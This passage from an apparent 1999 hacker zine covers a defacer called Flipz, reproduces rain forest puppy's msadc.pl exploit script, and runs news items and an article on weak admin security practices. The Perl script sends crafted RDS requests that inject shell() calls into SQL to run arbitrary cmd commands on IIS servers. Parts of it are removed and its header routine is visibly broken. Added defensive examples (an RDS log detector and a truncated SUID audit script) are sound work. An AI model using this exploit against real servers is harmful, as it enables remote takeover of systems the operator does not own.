       them to raid me," he said.  

       He explained that he hadn't done much to cover his tracks because they'd
       find him anyway.  "Why bother with twenty hops when they'll just issue
       twenty subpoenas?"  And, he added, "even if I cover my tracks well... all
       they need is one person on IRC to say 'oh, I know who this person is.'"

       The FBI, at this point, doesn't seem to know Flipz' identity.  They asked
       me several times in a later interview, and each time came up empty because
       I didn't know myself.  More is available on the FBI.

       Skills

       Some people on IRC have questioned Flipz' skills.  Flipz says that he
       "works with NT on a daily basis [as a] systems analyst" but others aren't
       too sure.

       "He's demonstrated no real NT skills," said one IRCer who knew flipz but
       wished to remain anonymous.  This IRCer said that all the defacements
       were on NT systems running IIS, insinuating that Flipz was simply using the
       eEye exploit released earlier this year.

       But Flipz maintains that "I'm not using IIS, I'm not using FrontPage, I'm not
       using FTP exploits..."  Rather, he says he's using "some exploits modified
       for my own use and a private one or two."  More detail on his
       methodology, or speculation thereof, is available.
       
       
      Related links:
      
      http://www.aviary-mag.com/News/FBI/fbi.html      
      http://www.aviary-mag.com/News/Old_News/IIS___eEye/iis___eeye.html
      http://www.aviary-mag.com/News/The_Exploit/the_exploit.html
      
      
      
      
      
      Flipz' Exploit? (Previously released)
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
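
      For defenders: the requests made by the script reproduced below (calls under
      /msadc/msadcs.dll, the newdsn.exe DSN creation and the ACTIVEDATA user agent) are
      visible in web server logs. The following log check is an added example, not part of
      the original script or article; the log lines, addresses and function names are
      constructed, and the W3C extended field layout is an assumption about how the server
      logs.

```python
import urllib.parse

# Constructed W3C extended log lines (documentation-range addresses, not real traffic).
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status cs(User-Agent)
1999-11-20 04:12:01 192.0.2.10 GET /default.htm - 200 Mozilla/4.0+(compatible;+MSIE+5.0)
1999-11-20 04:12:09 198.51.100.7 POST /msadc/msadcs.dll/VbBusObj.VbBusObjCls.GetMachineName - 200 ACTIVEDATA
1999-11-20 04:12:11 198.51.100.7 GET /scripts/tools/newdsn.exe driver=Microsoft%2BAccess%2BDriver%2B%28*.mdb%29&dsn=wicca&dbq=c%3A%5Csys.mdb&newdb=CREATE_DB&attr= 200 -
1999-11-20 04:12:15 198.51.100.7 POST /msadc/msadcs.dll/AdvancedDataFactory.Query - 200 ACTIVEDATA
1999-11-20 04:13:40 192.0.2.10 GET /images/logo.gif - 304 Mozilla/4.0+(compatible;+MSIE+5.0)
"""

RDS_PREFIX = "/msadc/msadcs.dll"


def parse_w3c(text):
    """Yield one dict per request, using the field order from the #Fields directive."""
    fields = []
    for line in text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
        elif line and not line.startswith("#") and fields:
            values = line.split()
            if len(values) == len(fields):  # skip malformed or truncated lines
                yield dict(zip(fields, values))


def classify(entry):
    """Return the reasons a request resembles the traffic the script generates."""
    stem = urllib.parse.unquote(entry.get("cs-uri-stem", ""))
    low = stem.lower()
    query = entry.get("cs-uri-query", "").lower()
    reasons = []
    if low == RDS_PREFIX or low.startswith(RDS_PREFIX + "/"):
        method = stem[len(RDS_PREFIX):].lstrip("/")
        reasons.append("rds-call:" + (method or "(none)"))
    if low.endswith("/newdsn.exe"):
        reasons.append("newdsn-create-db" if "newdb=create_db" in query else "newdsn-request")
    # Secondary signal only: this is the agent string the script sends, but a
    # legitimate RDS client may present the same value.
    if entry.get("cs(User-Agent)", "") == "ACTIVEDATA":
        reasons.append("ua-activedata")
    return reasons


def suspicious_sources(text):
    """Group matching requests by client address: {ip: [(time, reason), ...]}."""
    by_ip = {}
    for entry in parse_w3c(text):
        for reason in classify(entry):
            by_ip.setdefault(entry["c-ip"], []).append((entry["time"], reason))
    return by_ip


if __name__ == "__main__":
    for ip, events in suspicious_sources(SAMPLE_LOG).items():
        print(ip)
        for when, reason in events:
            print("   ", when, reason)
```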
      

      ########################################################################

      #!/usr/bin/perl
      #
      # MSADC/RDS 'usage' (aka exploit) script version 2
      #
      #       by rain forest puppy
      #
      #       - added UNC support, really didn't clean up code, but oh well

      use Socket; use Getopt::Std;
      getopts("e:vd:h:XRVNwcu:s:", \%args);

      print "-- RDS smack v2 - rain forest puppy / ADM / wiretrip --\n";

      if (!defined $args{h} && !defined $args{R}) {
      print qq~
      Usage: msadc.pl -h <host> { -d <delay> -X -v }
              -h <host>               = host you want to scan (ip or domain)
              -d <seconds>            = delay between calls, default 1 second
              -X                      = dump Index Server path table, if available
              -N                      = query VbBusObj for NetBIOS name
              -V                      = use VbBusObj instead of ActiveDataFactory
              -v                      = verbose
              -e                      = external dictionary file for step 5
              -u <\\\\host\\share\\file>      = use UNC file
              -w                      = Windows 95 instead of Windows NT
              -c                      = v1 compatibility (three step query)
              -s <number>             = run only step <number>

              Or a -R will resume a (v2) command session

      ~; exit;}

      ###########################################################
      # config data

      @drives=("c","d","e","f","g","h");

      @sysdirs=("winnt","winnt35","winnt351","win","windows");

      # we want 'wicca' first, because if step 2 made the DSN, it's ready to go
      @dsns=("wicca", "AdvWorks", "pubs", "CertSvr", "CFApplications",
              "cfexamples", "CFForums", "CFRealm", "cfsnippets", "UAM",
              "banner", "banners", "ads", "ADCDemo", "ADCTest");

      # this is sparse, because I don't know of many
      @sysmdbs=(      "\\catroot\\icatalog.mdb",
                      "\\help\\iishelp\\iis\\htm\\tutorial\\eecustmr.mdb",
                      "\\system32\\help\\iishelp\\iis\\htm\\tutorial\\eecustmr.mdb",
                      "\\system32\\certmdb.mdb",
                      "\\system32\\ias\\ias.mdb",
                      "\\system32\\ias\dnary.mdb",
                      "\\system32\\certlog\\certsrv.mdb" ); #these are %systemroot%
      @mdbs=( "\\cfusion\\cfapps\\cfappman\\data\\applications.mdb",
              "\\cfusion\\cfapps\\forums\\forums_.mdb",
              "\\cfusion\\cfapps\\forums\\data\\forums.mdb",
              "\\cfusion\\cfapps\\security\\realm_.mdb",
              "\\cfusion\\cfapps\\security\\data\\realm.mdb",
              "\\cfusion\\database\\cfexamples.mdb",
              "\\cfusion\\database\\cfsnippets.mdb",
              "\\inetpub\\iissamples\\sdk\\asp\\database\\authors.mdb",
              "\\progra~1\\common~1\\system\\msadc\\samples\\advworks.mdb",
              "\\cfusion\\brighttiger\\database\\cleam.mdb",
              "\\cfusion\\database\\smpolicy.mdb",
              "\\cfusion\\database\cypress.mdb",
              "\\progra~1\\ableco~1\\ablecommerce\\databases\\acb2_main1.mdb",
              "\\website\\cgi-win\\dbsample.mdb",
              "\\perl\\prk\\bookexamples\\modsamp\\database\\contact.mdb",
              "\\perl\\prk\\bookexamples\\utilsamp\\data\\access\\prk.mdb"
              );  #these are just \
      ###########################################################

      $ip=$args{h}; $clen=0; $reqlen=0; $|=1; $target="";
      if (defined $args{v}) { $verbose=1; } else {$verbose=0;}
      if (defined $args{d}) { $delay=$args{d};} else {$delay=1;}
      if(!defined $args{R}){ $target= inet_aton($ip)
              || die("inet_aton problems; host doesn't exist?");}
      if (!defined $args{R}){ $ret = &has_msadc; }

      if (defined $args{X}) { &hork_idx; exit; }
      if (defined $args{N}) { &get_name; exit; }

      if (defined $args{w}){$comm="command /c";} else {$comm="cmd /c";}
      if (defined $args{R}) { &load; exit; }

      print "Type the command line you want to run ($comm assumed):\n"
              . "$comm ";
      $in=<STDIN>;    chomp $in;
      $command="$comm " . $in ;

      if (!defined $args{s} || $args{s}==1){
      print "\nStep 1: Trying raw driver to btcustmr.mdb\n";
      &try_btcustmr;}

      if (!defined $args{s} || $args{s}==2){
      print "\nStep 2: Trying to make our own DSN...";
      if (&make_dsn){ print "<<success>>\n"; sleep(3); } else {
              print "<<fail>>\n"; }}   # we need to sleep to let the server catchup

      if (!defined $args{s} || $args{s}==3){
      print "\nStep 3: Trying known DSNs...";
      &known_dsn;}

      #crippled

      if (!defined $args{s} || $args{s}==5){
      if (defined $args{u}){
      print "\xStep 5: Trying UNC...";
      &use_unc; } else { "\nNo -u; Step 5 skipped.\n"; }}

      if (!defined $args{s} || $args{s}==6){
      if (defined $args{e}){
      print "\nStep 6: Trying dictionary of DSN names...";
      &dsn_dict; } else { "\nNo -e; Step 6 skipped.\n"; }}

      print "\n\nNo luck, guess you'll have to use a real hack, eh?\n";
      exit;

      ##############################################################################

      sub sendraw {   # this saves the whole transaction anyway
              my ($pstr)=@_;
              socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) ||
                      die("Socket problems\n");
              if(connect(S,pack "SnA4x8",2,80,$target)){
                      open(OUT,">raw.out");   my @in;
                      select(S);      $|=1;   print $pstr;
                      while(<S>){ print OUT $_; push @in, $_;
                              print STDOUT "." if(defined $args{X});}
                      close(OUT); select(STDOUT); close(S); return @in;
              } else { die("Can't connect...\n"); }}

      ##############################################################################

      sub make_header {  # make the HTTP request
      my $aa, $bb;
      if (defined $args{V}){
      $aa="VbBusObj.VbBusObjCls.GetRecordset";
      $bb="2";
      } else {
      $aa="AdvancedDataFactory.Query";
      $bb="3";}

      #crippled

      ADCClientVersion:01.06
      Content-Type: multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=$bb

      --!ADM!ROX!YOUR!WORLD!
      Content-Type: application/x-varg
      Content-Length: $reqlen

      EOT
      ;
      $msadc=~s/\n/\r\n/g;
      return $msadc;}

      ##############################################################################

      sub make_req {  # make the RDS request
      my ($switch, $p1, $p2)=@_;
      my $req=""; my $t1, $t2, $query, $dsn;

      if ($switch==1){ # this is the btcustmr.mdb query
      $query="Select * from Customers where City='|shell(\"$command\")|'";
      $dsn="driver={Microsoft Access Driver (*.mdb)};dbq=" .
              $p1 . ":\\" . $p2 . "\\help\\iis\\htm\\tutorial\\btcustmr.mdb;";}

      elsif ($switch==2){ # this is general make table query
      $query="create table AZZ (B int, C varchar(10))";
      $dsn="$p1";}

      elsif ($switch==3){ # this is general exploit table query
      $query="select * from AZZ where C='|shell(\"$command\")|'";
      $dsn="$p1";}

      elsif ($switch==4){ # attempt to hork file info from index server
      $query="select path from scope()";
      $dsn="Provider=MSIDXS;";}

      elsif ($switch==5){ # bad query
      $query="select";
      $dsn="$p1";}

      elsif ($switch==6){ # this is table-independant query (new)
      $query="select * from MSysModules where name='|shell(\"$command\")|'";
      $dsn="$p1";}

      $t1= make_unicode($query);
      $t2= make_unicode($dsn);
      if(defined $args{V}) { $req=""; } else {$req = "\x02\x00\x03\x00"; }
      $req.= "\x08\x00" . pack ("S1", length($t1));
      $req.= "\x00\x00" . $t1 ;
      $req.= "\x08\x00" . pack ("S1", length($t2));
      $req.= "\x00\x00" . $t2 ;
      $req.="\r\n--!ADM!ROX!YOUR!WORLD!--\r\n";
      return $req;}

      ##############################################################################

      sub make_unicode { # quick little function to convert to unicode
      my ($in)=@_; my $out;
      for ($c=0; $c < length($in); $c++) { $out.=substr($in,$c,1) . "\x00"; }
      return $out;}

      ##############################################################################

      sub rdo_success {  # checks for RDO return success (this is kludge)
      my (@in) = @_; my $base=content_start(@in);
      if($in[$base]=~/multipart\/mixed/){
      return 1 if( $in[$base+10]=~/^\x09\x00/ );}
      return 0;}

      ##############################################################################

      sub make_dsn {  # this (tries to) make a DSN for us
      print "\nMaking DSN: ";
      foreach $drive (@drives) {
      print "$drive: ";
      my @results=sendraw("GET /scripts/tools/newdsn.exe?driver=Microsoft\%2B" .
              "Access\%2BDriver\%2B\%28*.mdb\%29\&dsn=wicca\&dbq="
              . $drive . "\%3A\%5Csys.mdb\&newdb=CREATE_DB\&attr= HTTP/1.0\n\n");
      $results[0]=~m#HTTP\/([0-9\.]+) ([0-9]+) ([^\n]*)#;
      return 0 if $2 eq "404"; # not found/doesn't exist
      if($2 eq "200") {
        foreach $line (@results) {
          return 1 if $line=~/<H2>Datasource creation successful<\/H2>/;}}
      } return 0;}

      ##############################################################################

      sub verify_exists {
      my ($page)=@_;
      my @results=sendraw("GET $page HTTP/1.0\n\n");
      return $results[0];}

      ##############################################################################

      sub try_btcustmr {

      foreach $dir (@sysdirs) {
       print "$dir -> "; # fun status so you can see progress
       foreach $drive (@drives) {
       print "$drive: ";  # ditto
      $reqlen=length( make_req(1,$drive,$dir) ) - 28;
      $reqlenlen=length( "$reqlen" );
      $clen= 206 + $reqlenlen + $reqlen;

      my @results=sendraw(make_header() . make_req(1,$drive,$dir));
      if (rdo_success(@results)){print "Success!\n";

      save("dbq=".$drive.":\\".$dir."\\help\\iis\\htm\\tutorial\\btcustmr.mdb;");
              exit;}
      else { verbose(odbc_error(@results)); funky(@results);}} print "\n";}}

      ##############################################################################

      sub odbc_error {
      my (@in)=@_; my $base;
      my $base = content_start(@in);
      if($in[$base]=~/application\/x-varg/){ # it *SHOULD* be this
      $in[$base+4]=~s/[^a-zA-Z0-9 \[\]\:\/\\'\(\)]//g;
      $in[$base+5]=~s/[^a-zA-Z0-9 \[\]\:\/\\'\(\)]//g;
      $in[$base+6]=~s/[^a-zA-Z0-9 \[\]\:\/\\'\(\)]//g;
      return $in[$base+4].$in[$base+5].$in[$base+6];}
      print "\nNON-STANDARD error.  Please sent this info to rfp\@wiretrip.net:\n";
      print "$in : " . $in[$base] . $in[$base+1] . $in[$base+2] . $in[$base+3] .
              $in[$base+4] . $in[$base+5] . $in[$base+6]; exit;}

      ##############################################################################

      sub verbose {
      my ($in)=@_;
      return if !$verbose;
      print STDOUT "\n$in\n";}

      ##############################################################################

      sub save {
      my ($p1)=@_; my $ropt="";
      open(OUT, ">rds.save") || print "Problem saving parameters...\n";
      if (defined $args{c}){ $ropt="c ";}
      if (defined $args{V}){ $ropt.="V ";}
      if (defined $args{w}){ $ropt.="w ";}
      print OUT "v2\n$ip\n$ropt\n$p1\n";
      close OUT;}

      ##############################################################################

      sub load {
      my ($action)=@_;
      my @p; my $drvst="driver={Microsoft Access Driver (*.mdb)};";
      open(IN,"<rds.save") || die("Couldn't open rds.save\n");
      @p=<IN>; close(IN);
      die("Wrong rds.save version") if $p[0] ne "v2\n";
      $ip="$p[1]"; $ip=~s/\n//g;
      $target= inet_aton($ip) || die("inet_aton problems");
      print "Resuming to $ip ...";
      @switches=split(/ /,$p[2]);
      foreach $switch (@switches) {
              $args{$switch}="1";}

      if (defined $args{w}){$comm="command /c";} else {$comm="cmd /c";}
      print "Type the command line you want to run ($comm assumed):\n"
              . "$comm ";
      $in=<STDIN>;    chomp $in;
      $command="$comm " . $in ;

      $torun="$p[3]"; $torun=~s/\n//g;
      if($torun=~/btcustmr/){
              $args{'c'}="1";}   # this is a kludge to make it work

      if($torun=~/^dbq/){ $torun=$drvst.$torun; }

      if(run_query("$torun")){
              print "Success!\n";} else { print "failed\n"; }
      exit;}

      ##############################################################################

      sub create_table {
      return 1 if (!defined $args{c});
      return 1 if (defined $args{V});
      my ($in)=@_;
      $reqlen=length( make_req(2,$in,"") ) - 28;
      $reqlenlen=length( "$reqlen" );
      $clen= 206 + $reqlenlen + $reqlen;
      my @results=sendraw(make_header() . make_req(2,$in,""));
      return 1 if rdo_success(@results);
      my $temp= odbc_error(@results);  verbose($temp);
      return 1 if $temp=~/Table 'AZZ' already exists/;
      return 0;}

      ##############################################################################

      sub known_dsn {
      foreach $dSn (@dsns) {
              print ".";
              next if (!is_access("DSN=$dSn"));
              if(create_table("DSN=$dSn")){
              if(run_query("DSN=$dSn")){
              print "$dSn: Success!\n"; save ("dsn=$dSn"); exit; }}} print "\n";}

      ##############################################################################

      sub is_access {
      my ($in)=@_;
      return 1 if (!defined $args{c});
      return 1 if (defined $args{V});
      $reqlen=length( make_req(5,$in,"") ) - 28;
      $reqlenlen=length( "$reqlen" );
      $clen= 206 + $reqlenlen + $reqlen;
      my @results=sendraw(make_header() . make_req(5,$in,""));
      my $temp= odbc_error(@results);
      verbose($temp); return 1 if ($temp=~/Microsoft Access/);
      return 0;}

      ##############################################################################

      sub run_query {
      my ($in)=@_; my $req;
      if (defined $args{c}){$req=3;} else {$req=6;}
      $reqlen=length( make_req($req,$in,"") ) - 28;

      $reqlenlen=length( "$reqlen" );
      $clen= 206 + $reqlenlen + $reqlen;
      my @results=sendraw(make_header() . make_req($req,$in,""));
      return 1 if rdo_success(@results);
      my $temp= odbc_error(@results);  verbose($temp);
      return 0;}

      ##############################################################################

      #crippled

      ##############################################################################

      sub hork_idx {
      print "\nAttempting to dump Index Server tables...\n";
      print "  NOTE:  Sometimes this takes a while, other times it stalls\n\n";
      $reqlen=length( make_req(4,"","") ) - 28;
      $reqlenlen=length( "$reqlen" );
      $clen= 206 + $reqlenlen + $reqlen;
      my @results=sendraw(make_header() . make_req(4,"",""));
      if (rdo_success(@results)){
      my $max=@results; my $c; my %d;
      for($c=19; $c<$max; $c++){
              $results[$c]=~s/\x00//g;
              $results[$c]=~s/[^a-zA-Z0-9:~ \\\._]{1,40}/\n/g;
              $results[$c]=~s/[^a-zA-Z0-9:~ \\\._\n]//g;
              $results[$c]=~/([a-zA-Z]\:\\)([a-zA-Z0-9 _~\\]+)\\/;
              $d{"$1$2"}="";}
      foreach $c (keys %d){ print "$c\n"; }
      } else {print "Index server not installed/query failed\n"; }}

      ##############################################################################

      sub dsn_dict {
      open(IN, "<$args{e}") || die("Can't open external dictionary\n");
      while(<IN>){
              $hold=$_; $hold=~s/[\r\n]//g; $dSn="$hold"; print ".";
              next if (!is_access("DSN=$dSn"));
              if(create_table("DSN=$dSn")){
              if(run_query("DSN=$dSn")){
              print "Success!\n"; save ("dsn=$dSn"); exit; }}}
      print "\n"; close(IN);}

      ##############################################################################

      sub content_start { # this will take in the server headers
      my (@in)=@_; my $c;
      for ($c=1;$c<500;$c++) { # assume there's less than 500 headers
       if($in[$c] =~/^\x0d\x0a/){
        if ($in[$c+1]=~/^HTTP\/1.[01] [12]00/) { $c++; }
        else { return $c+1; }}}
      return -1;} # it should never get here actually

      ##############################################################################

      sub funky {
      my (@in)=@_; my $error=odbc_error(@in);
      if($error=~/ADO could not find the specified provider/){
      print "\nServer returned an ADO miscofiguration message\nAborting.\n";
      exit;}
      if($error=~/A Handler is required/){
      print "\nServer has custom handler filters (they most likely are patched)\n";
      exit;}
      if($error=~/specified Handler has denied Access/){
      print "\nADO handlers denied access (they most likely are patched)\n";
      exit;}
      if($error=~/server has denied access/){
      print "\nADO handlers denied access (they most likely are patched)\n";
      exit;}}

      ##############################################################################

      #crippled

      ##############################################################################

      sub use_unc {
      $uncpath=$args{u};
      $driverline="driver={Microsoft Access Driver (*.mdb)};dbq=";
      if(!$uncpath=~/^\\\\[a-zA-Z0-9_.]+\\[-a-zA-Z0-9_]+\\.+/){
              print   "Your UNC path sucks.  You need the following format:\n".
                      "\\server(ip preferable)\share\some-file.mdb\n\n"; exit; }

      if(create_table($driverline.$uncpath)){
        if(run_query($driverline.$uncpath)){
           print "Success!\n"; save ("dbq=".$uncpath); exit;}}
      }

      ##############################################################################

      sub get_name { # this was added last minute
      my $msadc=<<EOT
      POST /msadc/msadcs.dll/VbBusObj.VbBusObjCls.GetMachineName HTTP/1.1
      User-Agent: ACTIVEDATA
      Host: $ip
      Content-Length: 126
      Connection: Keep-Alive

      ADCClientVersion:01.06
      Content-Type: multipart/mixed; boundary=!ADM!ROX!YOUR!WORLD!; num-args=0

      --!ADM!ROX!YOUR!WORLD!--
      EOT
      ;  $msadc=~s/\n/\r\n/g;
      my @results=sendraw($msadc);
      my $base=content_start(@results);
      $results[$base+6]=~s/[^-A-Za-z0-9!\@\#\$\%^\&*()\[\]_=+~<>.,?]//g;
      print "Machine name: $results[$base+6]\n";}

      ##############################################################################
      # special greets to trambottic, hex_edit, vacuum (technotronic), all #!adm,
      # #!w00w00 & #rhino9 (that's a lot of people, and they are all very elite and
      # good friends!), wiretrip, l0pht, nmrc & all of phrack
      #
      # thumbs up to packetstorm, hackernews, phrack, securityfocus, ntsecadvice
      #
      # I wish I could really name everyone, but I can't.  Don't feel slighted if
      # your not on the list... :)
       ##############################################################################
      
       
       
       
      @HWA 
      
06.0  Online encrypted privacy for email and WWW
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 

      Submitted by: Ed
      URL: https://ca.privacyx.com/
      
      The PrivacyX website is an anonymous, encrypted web-based email system that
      lets you send encrypted anonymous email through their POP3 servers. You
      will have to accept a signed certificate from their site and install it on your
      system. The site currently offers only 512-bit keys, presumably to keep the
      international nature of the site open. Once you have edited your config to use
      the mail.privacyx.com servers you are ready to send and receive email using the
      service. A test email sent an hour ago has still not arrived; I'll update
      when (if) it comes through.
      
      
      @HWA      
      
      
      
07.0  More on the Chris Buckley Saga
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      Contributed by Abattis
      
      From http://www.theregister.co.uk/991119-000003.html
      
      Posted 19/11/99 11:56am by Linda Harrison

      0800 court case adjourned...

      Chris Buckley, the teenager accused of using a BT 0800 number to access the Web
      without permission, yesterday had his case adjourned to December. 

      The 18-year-old had his appearance at Corby Magistrates Court, Northamptonshire, put
      back to December 3 to enable his solicitor to take instructions. 

      Buckley, from Oundle, Northamptonshire, allegedly used a BT freephone number to access
      the Net without authorisation or permission. 

      He faces three charges: gaining unauthorised access to the Internet; posting material on
      newsgroups that may have caused "an annoyance"; and using profanities.
      
      -=-
      
      Posted 18/05/99 11:44am by Tim Richardson

      Fraud charges follow abuse of BT 0800 test number

      An anonymous Net user has been accused of fraud and threatened with legal action for
      using a toll-free number to access the Web that was reserved for use by BT staff. 

      A letter, purportedly sent by BT customer relations manager Keith Lawton, orders the
      unnamed customer to cough up for the 680 hours and 45 minutes spent online illegally -- or
      face legal action. 

      The letter also warns the crafty BT customer that if he/she does it again, the police will be
      called "with a view to criminal charges being brought". 

      Having already issued a warning to stop using the number, Lawton wrote: "By continuing to
      use that freephone number you have committed fraud against us." 

      "As you have knowingly used our internal ISP without our express authorisation, we are
      billing you for all the time that you have been online using our freephone number by
      converting all time spent online to a national number," Lawton wrote. 

      There is no indication exactly how much the bill is for but it could run into many hundreds of
      pounds. 

      A spokesman for BT said the company would not comment on an individual customer's bill
      and also questioned the validity of the letter.

      It could be genuine, or it could be a hoax, he said. 

      Since no one is prepared to say one way or the other, The Register has decided to let its
      readers decide whether it's kosher or not. 
      
      Check out the letter here: http://www.angelfire.com/ar/bt0800/
      
      -=-
      
      Posted 19/05/99 11:44am by Tim Richardson

      BT fraud letter outed as a fake

      The letter accusing a BT customer of fraud is bogus, according to a learned reader of The
      Register. 

      Matthew Garrett, a medical student at Cambridge University said: "The alleged letter from
      BT is a fake. 

      "Putting it through a colour filter reveals that the BT logo in the top left corner and the bar
      code and footer have been scanned in and pasted on top of a computer-generated
      document. 

      "Creases are also clearly visible around the staple region, but oddly enough aren't
      anywhere else on the page. 

      "And as a final nail in its coffin, the background of the main page is full red, green and blue,
      a value that is highly unlikely to occur in nature since paper tends to be slightly off-white. 

      "The rest of the page is plain and perfect white, which would only occur in a
      computer-generated image. 

      "Hence it is fake. 

      "If anyone can produce that with a scanner and a perfectly ordinary sheet of paper, I'd be
      greatly impressed. 

      "My version of it is here, and I know there's some other enhanced copies floating around,"           
      he said. 
      
      http://www-jcsu.jesus.cam.ac.uk/~mjg59/0800.jpg
      

      To see yesterday's story about the alleged fake letter, click here. 

      After his thorough job on this little number it looks like Matthew will have no problems sailing
      through his post mortem course.
      
      -=-
      
      Unrelated story:
      
      Posted 12/11/99 3:41pm by Tim Richardson

      22,000 people and the 08004u security lapse

      It seems the 22,000 or so people who gained totally toll-free access to the Net earlier this
      week courtesy of Scottish ISP, 08004u, didn't even have to blag their way past password
      security. 

      That's because there was no security. It simply didn't exist. Any login ID and password
      would have got them into 08004u's network and onto the Web, The Register has learned. 

      According to some of those who took advantage of the Scottish ISP's generosity, 08004u
      just left the doors wide open allowing anyone to walk in completely uncontested. 

      "I could dial their 0800 number, and have the login IAMCOOL and password ANYTHING,
      and it would work," wrote one Net user who asked to remain anonymous. 

      "I find this to be an insult to the people that are paying their £50 a month [for unmetered
      access]," he said, revealing he was one of 08004u's subscribers. 

      It'll be interesting to know how 08004u is planning to pay for this charity...after all, there's no
      such thing as a free lunch.

      
      @HWA
      
08.0  Security Practices Today, Or Lack Thereof 
      ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
      
      From HNN http://www.hackernews.com/  


      contributed by Erik 
      A new article in the Buffer Overflow section illustrates
      what system administrators are doing these days in the
      way of security. You may be surprised, or not, at what
      some administrators consider to be secure computing
      practices. 

      Buffer Overflow       
      http://www.hackernews.com/orig/buffero.html
                                                           
      Security practices today. Or lack thereof 


      By: Erik Parker - Bio
      Mind Security 

      Companies are not giving computer security the attention
      that it needs. I have interviewed several System
      Administrators and Security Administrators. What I found
      was what I had expected, that things just aren't getting
      done the way they should be. 

      Most companies that have over 100 employees have their
      own computer operations staff. Unix Administrators, NT
      Administrators, Novell Administrators, Etc., of course all
      depending on the individual network. Companies that are
      computer companies, making software, doing internet
      business, or depend on every single user using their
      computer usually have larger network staffs, makes sense
      right? 

      All too often network security is not a concern on these
      smaller networks. Even more sad than that, all too often it
      isn't a concern on larger networks. Networks with
      thousands of users, and a fulltime staff of administrators,
      or companies who have permanent in house contractors.
      "Network Security" is left up to the Administrators. That
      isn't so bad if your administrators happen to be security
      specialists. However, most of the time that isn't the case.

      Companies expect their network to be secure, or just
      don't expect. Many places don't have policies, or have a
      plan to someday start one, but don't want to bother until
      it becomes a problem, after they have been hacked, or
      inside info starts leaking out, and the SEC is coming down
      their throat. 

      We interviewed 7 Unix Administrators, and 3 NT
      Administrators. We didn't gain any worthwhile knowledge
      from the NT Administrators, as none of them knew about
      security or were concerned with it. If I had more time, I
      could have interviewed some that dealt with their own
      firewalls and all the network security. So from here on
      out, I will refer to only Unix Admins. All of the Unix Admins
      we interviewed were in charge of keeping their machines
      secure. Some were in charge of their firewall, some
      weren't. 

      The most common security practice was simply shutting
      down services that weren't needed. End of story. Other
      cases the Admins would keep lists of patch levels, and
      every couple of months go out and check for new versions
      of their daemons they were running. Many of them didn't
      know how to search their machines for SUID binaries, and
      couldn't understand why it would matter. Several others
      claimed that they didn't bother to shut down services,
      because the firewall blocked all incoming connections to
      those machines except on specific ports, like SMTP and
      HTTP. When I asked those Admins if they were in control
      of their entire network, some were, and some weren't.
      The ones who weren't, claimed to know that there were
      other points of entry into the network besides the firewall
      that controls direct access to their specific server cluster.

      I asked a specific set of questions to each person, I never
      went on to ask questions to counter their responses.
      Mainly because if I had, I would have been teaching them
      security, and putting thoughts into their head. Well, that
      is why this article is being written. I was surprised to hear
      a few administrators tell me that they didn't worry about
      security breaches, because there was nothing on their
      network that hackers or crackers would care about. I
      guess I had to chuckle about that. 

      There doesn't have to be top-secret files, some new
      operating system, or something that is plainly obvious.
      Most of the hacks and cracks that you hear about, are
      done for web page changes. That seems to be what is in
      the media most often. Many hacks go unreported as well,
      for reasons of the stock market, embarrassment, and
      several Admins won't even admit to their own boss after
      finding out about the hack, as they think it will be thought
      of as their fault. Which, unless they are the security
      admin, and properly trained in it, it shouldn't be their fault.
      
      Companies often hire Security Penetration engineers, or if
      you will, strike teams, to break into their network, and
      test security. From outside or inside. Sometimes they
      don't bother to give these teams user level access, which
      is very stupid, since regular users could be the very
      problem. Also quite often a machine will be compromised
      via a daemon that isn't running as root, and only granting
      the hacker the daemon's user-level access, and from that
      they can gain root access from local exploits, the same
      local exploits some companies never have the strike teams
      check for. 
      
      Some of the Security Administrators I spoke to, gave me a
      quick run down of what they do to secure a network.
      Their quick list was to setup a firewall and only allow the
      access that was needed. I won't go into detail about
      proper firewall rules and such, I don't want to get that
      technical here. They also said they would remove utilities
      that aren't going to be used on the servers. For instance,
      an ultra 5 with Solaris 7 on it, that has one function, to
      run Apache and serve web pages all day, and do nothing
      else. Does it need the capability to print? Does it need
      Openwindows or CDE installed? No. These Admins would
      remove packages not needed, and other ones that aren't
      in use by the system. Others that may be used by the
      Admins at some point, and are Set UID root, get their
      sticky bit removed. Users don't need root level access to
      most of these. On most systems, if you would like to see
      all of the files on it that are SUID root, issue this
      command: 
      `find / \( -perm -4000 -o -perm -2000 ! -type d \) -exec ls -ldb {} \; >> output.log`
      The other things the Admins said they would do, are to
      keep up to date on all of the patches, and actively keep
      up with their software. I personally get on the maker of
      the software's mailing list, development lists, and user list.
      This makes for a pretty busy procmail, but you will catch
      things early on. Other things Security Admins do are to
      secure every machine, and any machine they aren't in
      control of they don't trust from anywhere on their
      network. They of course shut off all services not needed,
      like 98% of what is in /etc/inetd.conf. Any daemon that
      will run properly chrooted to its own directory gets set
      that way. Any program that can run as a non-privileged
      user gets set that way.
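
      The find command above gives a one-off listing; the script below is an added
      example (not from the article) that turns it into a repeatable check by saving a
      reviewed baseline of set-UID (4000) and set-GID (2000) files and reporting only
      files that gained one of those bits since. The function names and the baseline
      path in the usage comment are assumptions made for illustration.

```shell
#!/bin/sh
# Added example: baseline-and-diff audit of set-UID / set-GID files.
# All function names and paths here are hypothetical, chosen for illustration.
# Limitation: paths containing newlines are not handled.

# Print every regular file under $1 that carries the set-UID (4000) or
# set-GID (2000) bit, one path per line, in byte order so comm can diff it.
# -xdev keeps find on the starting filesystem (skips /proc, NFS mounts, ...).
list_privileged() {
    find "$1" -xdev -type f \( -perm -4000 -o -perm -2000 \) -print 2>/dev/null |
        LC_ALL=C sort
}

# Print the privileged files under $1 that are NOT in the reviewed baseline $2
# (a file previously written by list_privileged and checked by an admin).
new_privileged() {
    _cur=$(mktemp) || return 2
    list_privileged "$1" > "$_cur"
    # comm -13 suppresses columns 1 and 3: only lines unique to the new scan remain.
    LC_ALL=C comm -13 "$2" "$_cur"
    rm -f "$_cur"
}

# Return 0 when the scan matches the baseline, 1 when unreviewed privileged
# files exist (each is printed), 2 on internal error. Suitable for cron.
audit_privileged() {
    _new=$(new_privileged "$1" "$2") || return 2
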